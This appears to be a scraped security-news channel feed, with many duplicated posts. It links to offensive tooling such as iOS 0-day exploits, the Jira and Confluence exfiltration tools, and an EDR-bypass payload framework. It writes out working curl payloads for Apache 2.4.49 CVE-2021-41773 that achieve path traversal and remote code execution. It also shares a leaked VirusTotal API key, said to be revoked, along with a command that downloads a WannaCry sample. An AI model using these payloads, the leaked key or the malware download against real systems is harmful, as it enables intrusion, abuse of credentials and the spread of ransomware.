APT
Offensive WMI (Part 3) https://0xinfection.github.io/posts/wmi-registry-part-3/ #wmi
Offensive WMI - Reconnaissance & Enumeration (Part 4)
This post focuses on interacting with several WMI classes to extract useful and sensitive information
https://0xinfection.github.io/posts/wmi-recon-enum/
#wmi
This post focuses on interacting with several WMI classes to extract useful and sensitive information
https://0xinfection.github.io/posts/wmi-recon-enum/
#wmi
0xInfection's Blog
Offensive WMI - Reconnaissance & Enumeration (Part 4)
This is the fourth part of the “Offensive WMI” series which will focus a bit more on information gathering and enumeration. WMI provides a plethora of classes from which we can enumerate a lot of stuff. So let’s dive in without wasting any more time.
Gathering…
Gathering…
Information Gathering and Scanning for Sensitive Information
https://0xjoyghosh.medium.com/information-gathering-scanning-for-sensitive-information-reloaded-6ff3455e0d4e
#OSINT #Recon
https://0xjoyghosh.medium.com/information-gathering-scanning-for-sensitive-information-reloaded-6ff3455e0d4e
#OSINT #Recon
Medium
Information Gathering&scanning for sensitive information[ Reloaded ]
Testing Web-Application/Network , Information Gathering is important before we test for vulnerability on the target?
iOS 15 0day Exploits
https://github.com/illusionofchaos/ios-gamed-0day
https://github.com/illusionofchaos/ios-nehelper-wifi-info-0day
https://github.com/illusionofchaos/ios-nehelper-enum-apps-0day
#ios #0day #exploit
https://github.com/illusionofchaos/ios-gamed-0day
https://github.com/illusionofchaos/ios-nehelper-wifi-info-0day
https://github.com/illusionofchaos/ios-nehelper-enum-apps-0day
#ios #0day #exploit
GitHub
GitHub - illusionofchaos/ios-gamed-0day: iOS gamed exploit (fixed in 15.0.2)
iOS gamed exploit (fixed in 15.0.2). Contribute to illusionofchaos/ios-gamed-0day development by creating an account on GitHub.
Apache HTTP Server 2.4.49 Path Traversal (CVE-2021-41773)
https://twitter.com/ducnt_/status/1445386557574324234
#cve #apache
https://twitter.com/ducnt_/status/1445386557574324234
#cve #apache
Twitter
Nguyen The Duc
Just got worked exploit PoC for path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773) with my collab again @yabeow #bugbountytips 👀
APT
Apache HTTP Server 2.4.49 Path Traversal (CVE-2021-41773) https://twitter.com/ducnt_/status/1445386557574324234 #cve #apache
Payload
curl https://URL/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -k
APT
Payload curl https://URL/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -k
Apache 2.4.49 Payload RCE
curl --data "echo;id" 'https://127.0.0.1:55026/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'Certipy
Python implementation for Active Directory certificate abuse
https://github.com/ollypwn/Certipy
#ADCS
Python implementation for Active Directory certificate abuse
https://github.com/ollypwn/Certipy
#ADCS
GitHub
GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
Tool for Active Directory Certificate Services enumeration and abuse - ly4k/Certipy
Forwarded from PT SWARM
CVE-2021-26420: Remote Code Execution in Sharepoint via workflow compilation
👤 by The ZDI Research Team
In June of 2021, Microsoft released a patch to correct CVE-2021-26420 – a remote code execution bug in the supported versions of Microsoft SharePoint Server. This bug was reported to the ZDI program by an anonymous researcher and is also known as ZDI-21-755. This blog takes a deeper look at the root cause of this vulnerability.
This vulnerability could be used by an authenticated user to execute arbitrary .NET code on the server in the context and permissions of the service account of a SharePoint web application. For a successful attack, the attacker should have “Manage Lists” permissions on any SharePoint site. By default, any authenticated user can create their own site where they have the necessary permissions.
📝 Contents:
• The Vulnerability
• Proof of Concept
• Achieving Remote Code Execution
• Conclusion
https://www.zerodayinitiative.com/blog/2021/10/5/cve-2021-26420-remote-code-execution-in-sharepoint-via-workflow-compilation
👤 by The ZDI Research Team
In June of 2021, Microsoft released a patch to correct CVE-2021-26420 – a remote code execution bug in the supported versions of Microsoft SharePoint Server. This bug was reported to the ZDI program by an anonymous researcher and is also known as ZDI-21-755. This blog takes a deeper look at the root cause of this vulnerability.
This vulnerability could be used by an authenticated user to execute arbitrary .NET code on the server in the context and permissions of the service account of a SharePoint web application. For a successful attack, the attacker should have “Manage Lists” permissions on any SharePoint site. By default, any authenticated user can create their own site where they have the necessary permissions.
📝 Contents:
• The Vulnerability
• Proof of Concept
• Achieving Remote Code Execution
• Conclusion
https://www.zerodayinitiative.com/blog/2021/10/5/cve-2021-26420-remote-code-execution-in-sharepoint-via-workflow-compilation
Zero Day Initiative
Zero Day Initiative — CVE-2021-26420: Remote Code Execution in SharePoint via Workflow Compilation
In June of 2021, Microsoft released a patch to correct CVE-20 21-264 20 – a remote code execution bug in the supported versions of Microsoft SharePoint Server. This bug was reported to the ZDI program by an anonymous researcher and is also known as ZDI…
Jir-thief
A Red Team tool for exfiltrating sensitive data from Jira tickets.
https://github.com/antman1p/Jir-Thief
#jira #redteam
A Red Team tool for exfiltrating sensitive data from Jira tickets.
https://github.com/antman1p/Jir-Thief
#jira #redteam
GitHub
GitHub - antman1p/Jir-Thief: A Red Team tool for exfiltrating sensitive data from Jira tickets.
A Red Team tool for exfiltrating sensitive data from Jira tickets. - antman1p/Jir-Thief
Conf-thief
A Red Team tool for exfiltrating sensitive data from Confluence pages
https://github.com/antman1p/Conf-Thief
#confluence #redteam
A Red Team tool for exfiltrating sensitive data from Confluence pages
https://github.com/antman1p/Conf-Thief
#confluence #redteam
GitHub
GitHub - antman1p/Conf-Thief: A Red Team tool for exfiltrating sensitive data from Confluence pages.
A Red Team tool for exfiltrating sensitive data from Confluence pages. - antman1p/Conf-Thief
0-Day Hunting (Chaining Bugs/Methodology)
https://blog.riotsecurityteam.com/0day-chains
#0day #methodology
https://blog.riotsecurityteam.com/0day-chains
#0day #methodology
Red Team Tutorials
# https://crypt0jan.medium.com/red-team-tutorials-1-fcc509da20c4
# https://crypt0jan.medium.com/red-team-tutorials-2-e1b86016e231
# https://crypt0jan.medium.com/red-team-tutorials-3-351e76ea796d
# https://crypt0jan.medium.com/red-team-tutorials-4-616c565ccec9
#redteam #metasploit
# https://crypt0jan.medium.com/red-team-tutorials-1-fcc509da20c4
# https://crypt0jan.medium.com/red-team-tutorials-2-e1b86016e231
# https://crypt0jan.medium.com/red-team-tutorials-3-351e76ea796d
# https://crypt0jan.medium.com/red-team-tutorials-4-616c565ccec9
#redteam #metasploit
Medium
RED TEAM TUTORIALS — №1
By default, Meterpreter creates custom SSL certificates to encrypt traffic between the target and your C2 server if you turn on SSL. However, these custom SSL certificates contain fingerprintable…
ScareCrow
Payload creation framework designed around EDR bypass.
https://github.com/optiv/ScareCrow
#edr #bypass #av #fud
Payload creation framework designed around EDR bypass.
https://github.com/optiv/ScareCrow
#edr #bypass #av #fud
GitHub
GitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.
ScareCrow - Payload creation framework designed around EDR bypass. - optiv/ScareCrow
#bugbounty
Something interesting from our friends
https://medium.com/@i.safronov/mini-ctf-including-android-reverse-engineering-deobfuscation-antidebug-evasion-with-prizes-d32acc4a190c
Something interesting from our friends
https://medium.com/@i.safronov/mini-ctf-including-android-reverse-engineering-deobfuscation-antidebug-evasion-with-prizes-d32acc4a190c
Medium
Mini-CTF including Android reverse-engineering, deobfuscation, antidebug-evasion. With prizes.
Haven’t hacked anything in a while? Delivery Club cybersecurity team has a challenge for you! We created a vulnerable Android app, you need…
K8s takeover cases sample
https://github.com/Slurmio/webinar-seck8s/
https://github.com/Slurmio/webinar-seck8s/
GitHub
GitHub - slurm-personal/webinar-seck8s: Demo scripts for the Kubernetes Security Webinar held on October 13, 2021 https://www.…
Demo scripts for the Kubernetes Security Webinar held on October 13, 2021 https://www.youtube.com/watch?v=koTqZS-ThZ8&t=1183s - slurm-personal/webinar-seck8s
LDAP Monitor
Monitor creation, deletion and changes to LDAP objects live during your pentest or system administration!
With this tool you can quickly see if your attack worked and if it changed LDAP attributes of the target object.
https://github.com/p0dalirius/LDAPmonitor
#ldap #monitor
Monitor creation, deletion and changes to LDAP objects live during your pentest or system administration!
With this tool you can quickly see if your attack worked and if it changed LDAP attributes of the target object.
https://github.com/p0dalirius/LDAPmonitor
#ldap #monitor
VirusTotal Enterprise free API Key
API Key:
```859b88dbbd798a5093089e0455a3d44e9fcb411603041f447f1161be3b96fb18
```Example:
UPD:
This key has been revoked
#virustotal #enterprise #apikey #free
API Key:
```859b88dbbd798a5093089e0455a3d44e9fcb411603041f447f1161be3b96fb18
```Example:
curl 'https://www.virustotal.com/vtapi/v2/file/download?apikey=859b88dbbd798a5093089e0455a3d44e9fcb411603041f447f1161be3b96fb18&hash=76f52cba288145242a77a8762282d8d0e6d8fb3160b5fefb7b92649e503c62a1' --location --output wannacry.exe
SourceUPD:
This key has been revoked
#virustotal #enterprise #apikey #free